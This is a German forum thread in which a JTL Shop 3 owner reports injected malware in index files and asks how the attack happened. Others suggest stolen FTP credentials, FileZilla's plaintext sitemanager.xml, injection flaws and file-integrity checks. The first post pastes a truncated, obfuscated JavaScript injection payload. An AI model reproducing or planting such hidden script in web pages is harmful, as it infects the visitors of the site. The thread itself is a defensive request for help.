JTL Shop 3 gehackt...

[Coldstorm]

Hallo,

ich hatte einen Angriff auf meiner Seite. Seite ist noch im Wartungsmodus, aber trotzdem hatte ich ein Malware Script in der index.html, index.php, sämtliche Unterordner...
Es wurde folgendes eingefügt:

<!-- . --><script>el=document.createElement("div");el.innerHTML="ReferenceErr";el.appendChild(document.createTextNode("q"));el.replaceChild(document.createTextNode("l"),el.childNodes[1]);try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.firstChild.nodeValue+a.toString().substr(0,0);};ar="/aegl =cNbi{ufm >[nhtEo})\"<'v,A?Bp0Trq-.;:w]sCyd(1";ar2="R60c0c-20c12c-32c172c-4c-100c-60c20c8c-48c64c8c76c-144c-4c72c4c-68c-8c48c-48c64c8c96c-48c56c-44c-136c8c20c-28c52c-48c184c-84c-72c52c100c-4c-76c-12c-28c68c36c-76c-52c16c0c0c-20c12c92c-140c52c-48c136c48c-96c64c-1

usw....was hat das zum bedeuten? Reicht es aus, wenn ich nur das Script rausnehme oder muss ich komplette Backup reinspielen?
Muss ich nur die index.php und admin/index.php überschreiben oder sind da noch mehr dafür anfällige Dateien?
Wie kann so ein Angriff passieren? Habe total sicheres FTP-Passwort oder wie kommt da jemand rauf ?

 

[MBesancon]

AW: JTL Shop 3 gehackt...

Ich würde dir empfehlen alle Passwörter zu ändern und aus Sicherheitsgründen nur die Datenbank zu behalten. An deiner Stelle würde ich alle Dateien neu hochladen.

Der Zugriff erfolgt meistens über den eigenen PC. Ein "Schädling" kapert alle deine FTP-Zugangsdaten und geht diese der Reihe nach durch. Bei der Verbindung schreibt er sich dann in nahezu alle Dokumente die dem gewünschten Muster entsprechen. Meistens sind das Dateien mit dem Namen index.html oder index.php o.ä. Von daher mein Rat:

Alle Passwörter ändern! Dateien neu einspielen!

 

[Coldstorm]

AW: JTL Shop 3 gehackt...

Der Zugang erfolgt über den eigenen PC? Ich hab das schonmal gehabt, dann hab ich PC komplett neu aufgesetzt und nach gut einer Woche jetzt wieder gehackt...
Ich hab in Strato jetzt den Schreibzugriff für das komplette Verzeichnis aktiviert...darf ich das? Oder hindert das JTL Shop in irgendeiner Weise ?

Auszug:
Schreibschutz für gesamten Webspace oder einzelne Verzeichnisse

Auch beim Schreibschutz gilt, dass nach Aktivierung in der Grundeinstellung alle Verzeichnisse schreibgeschützt sind. Sofern Sie für einzelne Verzeichnisse den Schreibzugriff erlauben möchten, können Sie diese auf die "Ausschlussliste" setzen.

Bitte beachten Sie, dass der Ordner cgi-data ausgeschlossen sein muss (nicht geschützt), wenn Sie CGIs aus der STRATO CGI-Bibliothek verwenden, da die Scripte sonst nicht ausgeführt werden können.

Das trifft auch auf einige Funktionen des Kundenservicebereichs zu. Wenn Sie den Website-Configurator verwenden, um z. B. eigene Fehlerseiten oder den Verzeichnisschutz einzurichten, darf das Verzeichnis cgi-data sowie der Ordner, für den Sie die Einstellungen vornehmen möchten, nicht schreibgeschützt sein.


Um für ein oder mehrere Verzeichnisse den Schreibzugriff zu erlauben, wählen Sie diese bitte entsprechend aus der Liste aus und klicken jeweils auf Verzeichnis hinzufügen. In der "Ausschlussliste" können Sie die bereits hinzugefügten Verzeichnisse sehen.

Geänderte Einstellungen werden übernommen, wenn Sie auf Speichern klicken.

Möchten Sie den Schreibschutz nicht verwenden, setzen Sie die Option bitte auf Deaktiviert.

 

[david]

AW: JTL Shop 3 gehackt...

Habe total sicheres FTP-Passwort oder wie kommt da jemand rauf ?

Nutzt du Filezilla und hast dein Passwort im Sitemanager gespeichert?
Dann such mal auf deinem PC nach "sitemanager.xml" und schau dir dein Passwort im Klartext an...

Das meinte Marcel mit

Der Zugriff erfolgt meistens über den eigenen PC. Ein "Schädling" kapert alle deine FTP-Zugangsdaten und geht diese der Reihe nach durch.

 

[dihegroup]

AW: JTL Shop 3 gehackt...

Der Zugriff erfolgt meist NICHT über FTP Programme des Admins also in diesem Fall des Shop-Besitzers. Da fählt wohl leider das Wissen im JTL-Team.

Enthält der PHP-Code Fehler in der Programierung kann sehr viel realisiert werden. Schlagwort für Google ist z.B. PHP-Source-Injection. Oder siehe auch PHP-Vulnerabilities. Da gibt es ganze Bücher für. Oder auch SQL-Injection.

Daher ist es sehr dringend an JTL-Team bitte die Lücke finden (siehe Log-Dateien von dem der es gemeldet hat) Bei Strato müssen diese vorhanden sein. Anhand davon kann man sehen welcher php-Script Sicherheitsmängel enthält. Danach sofort updaten, da mit so was nicht zu spaßen ist, da Kunden-Daten vorhanden! Es können locker die Passwörter (in MD5 Hash-Form) von der DB mit SQL-Injection rauskopiert werden und wenn es dann klappt diese zu entschlüsseln, dann will ich gar nicht erst weiter denken...denn massenweise Kunden haben identische Passwörter...

 

[dihegroup]

AW: JTL Shop 3 gehackt...

aber kann auch natürlich sein dass die FTP-Passwörter ausspioniert wurden. Hier helfen auch die FTP-Logs von Strato Da ich kein Strato-Kunde bin kann ich nicht sagen wie es dort aussieht. Fakt ist, es muss bei so was immer geprüft werden woher es gekommen ist, denn wenn ein Kunde die Malware vom Shop kriegt so kommt er kaum wieder!

 

[Thomas Lisson]

AW: JTL Shop 3 gehackt...

Hallo dihegroup,

das ist ja nett, dass Du versuchst zu helfen. Aber uns die Kompetenz in Sachen Sicherheit bei der Webentwicklung abzusprechen, geht ein wenig zu weit. Bei dem Shop wurde ausserordentlich auf Sicherheit geachtet. Wir brauchen hier auch keine Schlagwörter hierzu zu googlen, da dies Grundwissen unserer Mitarbeiter ist.

Das Problem des Threaderstellers kommt definitiv über FTP.

Danach sofort updaten, da mit so was nicht zu spaßen ist, da Kunden-Daten vorhanden! Es können locker die Passwörter (in MD5 Hash-Form) von der DB mit SQL-Injection rauskopiert werden und wenn es dann klappt diese zu entschlüsseln

Hier liegst du komplett falsch - das trifft auf fast jedes andere Shopsystem zu, nicht auf JTL-Shop3. Weder speichern wir Passwörter als MD5 gehashed ab, noch sind Kundendaten in lesbarer Form in der DB hinterlegt. Alle sensiblen Daten sind verschlüsselt.

 

[Bremer]

AW: JTL Shop 3 gehackt...

Wie stellt man denn eigentlich fest das ein Malware Script eingefügt wurde?
Gibt es hier im Internet einen Scanner oder ein Plugin zur überwachung?

VG

Bremer

 

[dihegroup]

AW: JTL Shop 3 gehackt...

Gute Frage,

module habe ich hier solche noch nicht gesehen, allerdings gibt es im Admin-Bereich so was die Datei-Check. Natrürlich ist es etwas schwer, da bei mir z.B. viele Dateien verändert sind somit würde dieser Check fehlschlagen, aaaaber wenn man so was manuell steuern könnte z.B. nach dem man eine Datei-Verändert hat deren Hash-Wert abspeichert?! Allerdings ich weiß nicht so recht wie man es handhaben soll?! Denn dann müsste man diesen Wert wieder verschlüsseln?! ))) Nur eine Idee bitte keine Steine schmeißen ))

 

[Thomas Lisson]

AW: JTL Shop 3 gehackt...

Hi,

der Datei Check ist eine gute Möglichkeit. Da die PHP Dateien ohnehin nicht angepasst werden sollten, ist das ein guter Indikator, dass etwas an den Dateien nicht stimmt.

 

[dihegroup]

AW: JTL Shop 3 gehackt...

Hi,

der Datei Check ist eine gute Möglichkeit. Da die PHP Dateien ohnehin nicht angepasst werden sollten, ist das ein guter Indikator, dass etwas an den Dateien nicht stimmt.

vorrausgesetzt, das das Checksystem nicht manipuliert wird bzw. außer Kraft gesetzt wird.

 

[wood-deSign]

AW: JTL Shop 3 gehackt...

Hallo,

rein von der Logik her...

Der Zugriff erfolgt meist NICHT über FTP Programme des Admins also in diesem Fall des Shop-Besitzers. Da fählt wohl leider das Wissen im JTL-Team.

Enthält der PHP-Code Fehler in der Programierung kann sehr viel realisiert werden. Schlagwort für Google ist z.B. PHP-Source-Injection. Oder siehe auch PHP-Vulnerabilities. Da gibt es ganze Bücher für. Oder auch SQL-Injection.

kann das nicht stimmen.

Wenn es was AM SHOP wäre, gäbe es doch schon mehr solcher Fälle.

Seltsam... 2 x trifft es den selben Shop.
Andere Nutzer haben aber keine Probleme.

Mein Bauchgefühl sagt mir.. das liegt nicht am Shopcode.

Gruss, Frank

Edit: wenn es ein LOCH gäbe, wäre das auf den einschlägigen Seiten schon LANGE zum verkauf angeboten worden.
Oder die Person würde damit Prahlen oder sonst was in der Art.

Hier wird irgendein ScriptKid mit ´nem Keylogger / Trojaner zugriff auf den PC bekommen haben und da dann die FTP Daten ausgelesen / genutzt haben.

DAS kann man auch leicht prüfen. Das Log beim Provider kann zeigen wer / wann / von WO welche Datei geändert hat.

 

[dihegroup]

AW: JTL Shop 3 gehackt...

ist nur eine Frage der Zeit. Prallen muss man damit nicht. Es kommt auf die Besucherzahl des Shops an.

Eine Spaßgeschichte wäre ein Deface der Webseite bzw. des Shops. Eine Malware auszusetzen und dann noch in allen PHP-Dateien bzw. in vielen deutet schon auf was seriöseres hin. Anzunehmen zu dem ist, dass irgendwo auch eine PHP-Shell laufen könnte (wobei bei Strato eher nicht). So dass der Angreifer sich wieder zugang verschaffen könnte. Malware hat immer den Sinn nicht einfach jemandem zu schaden, sondern sich in andere Rechner einzunisten. Verschiedene Malware besuchen verschiedene Webseite was widerrum demjenigen Geld bringt. Also schon was seriöser als Scriptkiddy wie angenommen. Wenn viele Dateien berofen sind, dann auch hier kann man ruhig davon ausgehen, dass ein gewisser Automatismus ausgearbeitet wurde bzw. man mit einem spezielln Script gearbeitet hat, was schon die Scriptkiddys nicht mehr darin beteiligen lässt. Natürlich kann es auch nur ein Wurm sein, welcher die Passwörter vom FTP-Klaut und sich dor teinnistet, wo er die PHP-Dateien finden. Ich hoffe so war es auch und so was ist dann natürlich zu vernachlässigen, da kein Massenproblem.